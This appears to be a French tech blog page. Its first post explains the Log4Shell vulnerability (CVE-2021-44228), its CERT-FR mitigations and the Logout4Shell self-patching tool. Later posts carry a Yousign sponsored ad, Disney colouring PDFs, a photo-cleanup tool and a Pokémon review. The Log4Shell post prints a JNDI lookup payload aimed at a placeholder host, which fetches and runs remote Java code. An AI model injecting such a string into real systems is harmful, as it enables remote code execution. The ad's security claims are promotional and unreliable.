Aller au contenu
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

@  — 

Si vous vous intéressez un peu à la sécurité informatique, il ne vous aura pas échappé que le 9 décembre dernier, une faille 0day touchant Apache Log4j avait été divulguée. Baptisée Log4Shell, cette faille qui touche log4j de la version 2.0 à 2.14.1 a obtenu un score CVSS de 10/10 en matière de gravité.

Woohoo.

Ça transpire fort un peu partout surtout que la faille est actuellement utilisée. Pour vous la faire courte, il suffit de réussir à faire passer dans les logs analysés par log4j les caractères suivants.

${jndi:ldap://URL.com/FICHIER_JAVA}

et cela aura pour effet de télécharger et exécuter le fichier java qui est au bout de l’url « URL.com/FICHIER_JAVA ». C’est aussi simple que dramatique.

Schéma montrant comment la faille Log4j permet aux pirates de prendre le contrôle d'un système

Il y a beaucoup de littérature là-dessus notamment du côté du CERT-FR donc je ne vais pas m’étaler sur le sujet, mais un projet Github intéressant et amusant est né de tout ce bordel.

Vous le savez, pour patcher cette vulnérabilité Log4Shell (CVE-2021-44228), il faut de toute urgence mettre à jour log4j vers une version >= 2.15.0.

Et si ce n’est pas possible :

Pour les applications utilisant les versions 2.10.0 et ultérieures de la bibliothèque log4j, il est également possible de se prémunir contre toute attaque en modifiant le paramètre de configuration log4j2.formatMsgNoLookups à la valeur true, par exemple lors du lancement de la machine virtuelle Java avec l’option -Dlog4j2.formatMsgNoLookups=true. Une autre alternative consiste à supprimer la classe JndiLookup dans le paramètre classpath pour éliminer le vecteur principal d’attaque (les chercheurs n’excluent pas l’existence d’un autre vecteur d’attaque).

Cert FR

Mais une autre possibilité consiste à laisser faire la nature et c’est ce que propose Cybereason avec ce code baptisé Logout4Shell qui exploite la vulnérabilité Log4Shell pour… la patcher tout simplement.

Photo de scientifiques travaillant sur le vaccin contre la faille Log4Shell

Le payload qui est chargé via la faille va forcer l’enregistreur Log4j à se reconfigurer pour basculer le paramètre qui va bien sur True et empêchera ainsi toute exploitation ultérieure via cette attaque.

C’est un genre de cyber vaccin en attendant une vraie mise à jour de Log4j.

Si cela vous intéresse, le code est dispo sur Github.

Bon courage à ceux qui sont impactés.

Illustration d'une seringue injectant le vaccin contre la faille Log4Shell

A lire également :

@  — 

— En partenariat avec Yousign —

Un gain de temps phénoménal

Avec la généralisation du télétravail, mais également des rendez-vous en visioconférence, les entreprises ont dû se mettre à la signature électronique massivement.

En effet, grâce à la signature électronique, on évite d’imprimer d’épais documents sur papier, de les scanner pour les envoyer par email ou par la Poste. Et ainsi tout peut se faire à distance, de manière totalement transparente et sécurisée. C’est un gain de temps phénoménal !

Concrètement, il n’y a que des avantages avec la signature électronique. Que ce soit pour approuver un devis ou signer les documents d’une assemblée générale, tout se fait en douceur et rapidement. Pour l’utiliser régulièrement, je peux vous dire que c’est vraiment plus confortable de parapher et signer des centaines de pages d’un seul clic plutôt qu’avec un bon vieux stylo et il est beaucoup plus simple de recueillir les signatures de tout le monde sur plusieurs documents en même temps, surtout si tout le monde est éparpillé aux quatre coins de la France.

Signature électronique

Pour les clients à qui vous faites signer des devis par exemple, c’est également un super confort, car ils peuvent signer le document depuis n’importe où et à partir de n’importe quel ordinateur, tablette ou smartphone. Cela vous permet de conclure des contrats plus rapidement et donc d’augmenter votre efficacité commerciale.

Une sécurité renforcée

Et comme tout est dématérialisé, les documents sont envoyés automatiquement à toutes les parties et peuvent être conservés en lieu sûr ou intégrés dans vos processus techniques et chacun est informé lorsque toutes les signatures ont été collectées. L’absence de papier dans le processus permet également d’économiser des coûts d’impression, d’envoi, de déplacement…etc et donc de réduire un petit peu votre empreinte écologique. Plus de papier, plus de transport et moins de temps perdu !

Document signé électroniquement

Côté sécurité, la signature électronique garantit à la fois l’authenticité de la signature et l’intégrité du document grâce à du chiffrement et à des processus d’identification des signataires. Ainsi, il devient impossible de falsifier une signature électronique ou de modifier un document déjà signé. C’est un énorme avantage !

Sans parler du fait qu’un document papier peut-être volé ou perdu. Avec des documents sécurisés dans le cadre d’une signature électronique, ce risque devient presque nul.

Yousign – La référence en Europe

Si pour vous, la sécurité et la légalité de la signature électronique sont des facteurs importants, je vous invite à tester Yousign. Ainsi vous saurez comment faire une signature électronique très simplement, en profitant de leur offre d’essai de 14 jours.

Yousign est une solution de signature électronique française qui respecte le cadre juridique européen et qui est vraiment bien pensée. Tout le processus de création de documents, d’envoi et de signature est optimisé pour vous prendre le moins de temps possible.

En quelques clics, vos documents sont mis en ligne, et les signataires sont prévenus. Les relances pour les têtes en l’air sont automatiques et vous pouvez suivre en temps réel les invitations à signer.

Évidemment, Yousign a fait de la sécurité sa priorité numéro 1 et répondra à tous vos besoins de confidentialité et de traçabilité. La solution est d’ailleurs certifiée eIDAS (Electronic IDentification Authentication and trust Services), un règlement de l’UE sur l’identification électronique et les services de confiance pour les transactions électroniques au sein de l’Union Européenne). Elle intègre évidemment de l’authentification forte (OTP), du stockage chiffré et sécurisé et toutes les preuves sont horodatées et archivées sur la plateforme.

Sécuriser ses signatures avec la signature électronique

Ainsi, tous les signatures et documents signés via Yousign seront 100% légaux et sécurisés.

À découvrir ici.

@  — 

Les vacances de Noël approchent et si vous avez des enfants créatifs qui aiment les coloriages ou si vous-même pratiquez du coloriage pour adultes, histoire de vous détendre pendant les confs Zoom, j’ai ce qu’il vous faut.

Disney a mis en ligne sur son store un vingtaine de cahiers d’activité en PDF avec tous vos héros préférés. Des coloriages y compris pour adultes, des jeux, des tutos dessins…etc. de la Reine de Neige, de Marvel, Starwars, Nemo, Mickey et j’en passe.

Coloriage de Mickey Mouse à imprimer gratuitement

Vous retrouverez tous ces PDF en téléchargement sur cette page.

Notez qu’il y a également d’autres sections sur le site avec des jeux, des quizz, des cahiers pour apprendre à dessiner les personnages de Disney, et des activités manuelles

Coloriage de La Reine des Neiges à télécharger

Passez de bonnes fêtes de Noël (oui, je suis un peu en avance…). Pour ma part, je vais prendre 14 jours pour savoir dessiner Nemo et Spiderman correctement !

@  — 

Imaginez… Vous avez pris une photo que vous aimez beaucoup. Malheureusement, quelque chose ou quelqu’un est venu la « photo-bomber », c’est-à-dire s’incruster dessus pour gâcher à l’aide de son physique disgracieux l’arrière-plan que vous affectionniez beaucoup.

Comment faire quand on n’est pas un pro de la retouche photo ?

Et bien c’est simple, il suffit d’aller sur Cleanup.pictures, d’uploader votre photo et de gribouiller le machin que vous voulez retirer.

Et le résultat est magique ! En voici la preuve !

Supprimer les tâches sur une photo
Nettoyer une image en ligne
Effacer des objets sur une photographie
Retirer des éléments indésirables sur une image

Bluffant n’est-ce pas ?

Pour fonctionner, l’outil utilise le code du projet LaMa qui utilise un réseau neuronal pour reconstruire l’image en utilisant des convolutions de Fourier de manière super rapide.

Corriger des défauts sur une photo

De quoi mettre au chômage des générations de retoucheurs photos et briller en société notamment auprès de sa tata.

Amusez-vous bien !

@  — 

— Article rédigé par l’ami Remouk (DansTonChat) – Merci à lui —

La saga Pokémon compte un grand nombre de suites ou de spin-offs, et pourtant ça n’empêche pas l’usine à Pikachu de nous pondre régulièrement des remakes, histoire de faire du neuf avec du vieux… C’est le cas de Pokémon Perle Scintillante et Diamant Étincelant sur Switch, mais alors est-ce que ça mérite une petite place sous le sapin ?

Qui dit remake dit gameplay à l’ancienne : sous un nouveau moteur graphique tout beau tout frais (le jeu est mignon comme tout), se cache les mêmes rouages que les versions originales de Perle et Diamant. Ce n’est pas une mauvaise chose car ils étaient chouettes, et honnêtement ça m’a fait plaisir de retrouver une aventure traditionnelle, en vue de dessus comme à l’époque. On retombe en enfance. 👶

Peluche Pikachu sous le sapin de Noël

Alors c’est parti : on se balade de ville en ville dans la région de Sinnoh, on croise d’autres dresseurs, on les combats au tour par tour, on capture de nouvelles créatures, on les entraîne, elles évoluent, on affine son équipe pour espérer battre les champions d’arènes… De la stratégie, de la découverte, y a pas à dire, la formule de ce RPG est toujours aussi agréable !

Au niveau des changements, le partage d’XP est rendu obligatoire, ce qui arrange 90% des joueurs mais fera rager les puristes (à raison, car cela aurait pu être optionnel). Pour le reste, au-delà du visuel amélioré, quelques aspects secondaires sont intelligemment étoffés (les capacité secrètes, les sous-terrains, les concours, les fonctionnalités en ligne…), on apprécie les améliorations même si globalement nous sommes en terrain connu.

Carte de collection Pokémon Christmas Edition

Histoire de pinailler, parce qu’on adore ça : les petits défauts habituels de ce genre de jeux (textes impossibles à passer, actions répétitives dans les menus, etc.) sont malheureusement toujours présents, et les déplacements sont un peu rigides. Pas de quoi gâcher le fun, mais on aurait apprécié une ergonomie plus fluide, plus moderne, pour ces épisodes sortis il y a 15 ans.

Poupée Évoli en tenue de fête

Si la progression semble assez facile (grâce au multi XP ou aux aides mémoires sur l’efficacité des attaques, par exemple), le contenu reste conséquent et offre une excellente durée de vie. Remplir le Pokédex va vous prendre un bon paquet d’heures. 🙂 Pour cela, je pense que c’est une très bonne porte d’entrée pour découvrir la licence ou se faire un kiff rétro-nostalgique !

Bref c’est pas loin d’être le parfait petit Pokémon à l’ancienne, mais quelques anachronismes gâchent (très) légèrement la méga-teuf. Il n’empêche que si vous cherchez une aventure plus classique aux derniers jeux Pokémon (Épée et Bouclier), c’est une bonne alternative, une valeur sûre.

Offrir Pokémon Perle Scintillante ou Pokémon Diamant Étincelant

Le pack avec les deux versions